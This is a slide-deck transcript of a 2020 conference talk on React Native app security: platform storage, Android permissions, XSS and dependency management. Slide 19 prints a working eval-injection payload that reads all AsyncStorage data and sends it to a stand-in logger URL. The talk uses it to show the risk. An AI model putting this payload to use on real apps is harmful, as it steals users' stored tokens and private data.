Upgrade to Pro — share decks privately, control downloads, hide ads and more …

React Native Security

Julia Potapenko
December 05, 2020
Technology
0
230

React Native Security

Julia Potapenko

December 05, 2020
Tweet

More Decks by Julia Potapenko

See All by Julia Potapenko
Crypto wallets security: for developers
julep
0
2.1k
React Native Security
julep
0
310
Why can't developers make it secure?
julep
0
290
Encryption Export Regulations. Why should mobile developers care?
julep
0
130
The Art of Secure Architecture
julep
0
550
Common iOS Vulnerabilities and How to Fix Them
julep
1
1.8k
Secure Authentication. Are you sure you do it right?
julep
1
610
Making Authentication More Secure
julep
0
320
Touch ID and Face ID. Is It Secure?
julep
1
420

Other Decks in Technology

See All in Technology
javapを使ってクラスファイルを読んでみよう!
yujisoftware
1
190
Semantic Kernel を使って ChatGPT Plugins をアプリに組み込んでみよう
okazuki
0
150
NAB Show 2023 動画技術関連レポート / NAB Show 2023 Report
cyberagentdevelopers
PRO
1
150
Microsoft Startup Tech Meetup #0 : Kikuchi
hikiroku
1
120
エンジニアのキャリアパスはどう描く? まつもとりーさんと考える後悔しないキャリア選択
matsumoto_r
PRO
2
300
AIの標準化や法規制に関する動向 (2023年版)
asei
3
280
RedMica 2.3 (2023-05) 新機能ハイライト およびRedmineの2023年5月までの半年間の主要な開発成果
vividtone
0
150
Large Language Models: From Prototype to Production
inesmontani
PRO
9
2.9k
AWS Direct Connectと愉快なGWたちのおさらい
minorun365
5
1k
人工知能学会 AI哲学マップ・総括セッション 講演資料
miyayou
3
1k
WOFFの紹介
mmclsntr
0
120
copilot-cli(Fargate)でRailsを運用するためのTips / JAWS-UG Okayama 2023
interu
1
350

Featured

See All Featured
Build your cross-platform service in a week with App Engine
jlugia
222
17k
Testing 201, or: Great Expectations
jmmastey
26
5.9k
Facilitating Awesome Meetings
lara
35
4.8k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
270
12k
KATA
mclloyd
13
10k
Producing Creativity
orderedlist
PRO
335
38k
YesSQL, Process and Tooling at Scale
rocio
158
13k
Bootstrapping a Software Product
garrettdimon
PRO
299
110k
JavaScript: Past, Present, and Future - NDC Porto 2020
reverentgeek
39
3.7k
Fantastic passwords and where to find them - at NoRuKo
philnash
33
2k
The Web Native Designer (August 2011)
paulrobertlloyd
78
2.3k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
225
50k

Transcript

  1. React Native Security
    Addressing Typical Mistakes
    JULIA POTAPENKO

    View Slide

  2. About me
    Security Software
    Engineer at Cossack Labs
    We help companies to protect their
    sensitive and valuable data.
    @julepka

    View Slide

  3. We will talk about
    Architecture
    Platforms usage
    Dependencies

    View Slide

  4. “Choosing React Native and its components
    means that you understand and accept
    potential security consequences.”

    View Slide

  5. Architecture basics
    React Native is a cross-platform solution from Facebook
    that allows writing native apps using React (JavaScript or
    TypeScript).

    View Slide

  6. Trusting third parties
    Apple and Google are must haves.
    Add Facebook to the list.

    View Slide

  7. Trusting third parties
    Apple and Google are must haves.
    Add Facebook to the list.

    View Slide

  8. Trusting third parties
    Apple and Google are must haves.
    Add Facebook to the list.
    CVE-2020-1911

    CVE-2020-1912

    CVE-2020-1913

    View Slide

  9. “Working with React Native developers
    deal with security for all three platforms:
    iOS, Android and React Native.”

    View Slide

  10. OWASP Mobile
    Top 10
    #1
    Improper platform
    usage

    View Slide

  11. React Native is a leaky abstraction
    @vixentael

    View Slide

  12. Secure Store Example
    iOS Android
    Keychain
    SharedPreferences +
    KeyStore
    Data stored encrypted Yes Yes

    View Slide

  13. Secure Store Example
    iOS Android
    Keychain
    SharedPreferences +
    KeyStore
    Data stored encrypted Yes Yes
    Data persists across
    app reinstalls
    Yes No
    Hardware-backed
    encryption
    Yes
    Depends on device
    vendor
    Data decrypted only
    before usage
    Decrypted when
    device unlocked
    Yes

    View Slide

  14. Managing Android Permissions
    Android: You can add permissions in multiple files

    View Slide

  15. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Navite: It is common practice to use third-party
    solutions

    View Slide

  16. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Navite: It is common practice to use third-party
    solutions
    =

    View Slide

  17. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Native: It is common practice to use third-party
    solutions
    =

    I don’t need this permission
    The app crashes if I delete it

    View Slide

  18. Is XSS possible?
    XSS possibility is decreases by design.

    View Slide

  19. Is XSS possible?
    XSS possibility is decreases by design.
    XSS is still possible.
    eval()
    _reactNative.AsyncStorage.getAllKeys(function(err,result)
    {_reactNative.AsyncStorage.multiGet(result,function(err,result)
    {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});});
    Steal all the data from local storage (AsyncStorage) by exploiting
    eval-based injection and accessing React Native APIs

    View Slide

  20. Apart from Source Code
    Annual BIS Reports
    US encryption export regulations
    Apple privacy rules
    User acknowledgement about private data usage

    View Slide

  21. “50 shades of dependencies”

    View Slide

  22. A typical day for React Native app developer

    View Slide

  23. A typical day for React Native app developer
    (It is joke )

    View Slide

  24. Monitoring dependencies

    View Slide

  25. Monitoring dependencies

    So many dependencies
    Additional CI work
    Integrating dependency checkers

    View Slide

  26. Monitoring dependencies

    So many dependencies
    Additional CI work
    One update triggers another update
    Integrating dependency checkers
    Updates may be incompatible
    What if there is no fix for vulnerability?

    View Slide

  27. ✅ Learn more about the issue, its scope
    ✅ Document it, make the team aware
    ✅ Monitor it and book the time for the update
    What if there is no fix?

    View Slide

  28. ✅ Learn more about the issue, its scope
    ✅ Document it, make the team aware
    ✅ Monitor it and book the time for the update
    What if there is no fix?
    React Native requires team to plan time more carefully

    View Slide

  29. React Native requires team to plan time more carefully
    ➡ iOS or Android update
    ➡ React Native update
    ➡ Forked version update
    ➡ Dependencies update
    ➡ Mobile app source code update

    View Slide

  30. Final Thoughts
    “Learn once, write anywhere.”
    “Learn once, ask mobile security
    people for help.”

    View Slide

  31. Where to go next
    My React Native Security Article
    https://www.cossacklabs.com/blog/react-native-app-security.html
    React Native Security Guide
    https://reactnative.dev/docs/security

    View Slide

  32. Thank You!
    @julepka

    View Slide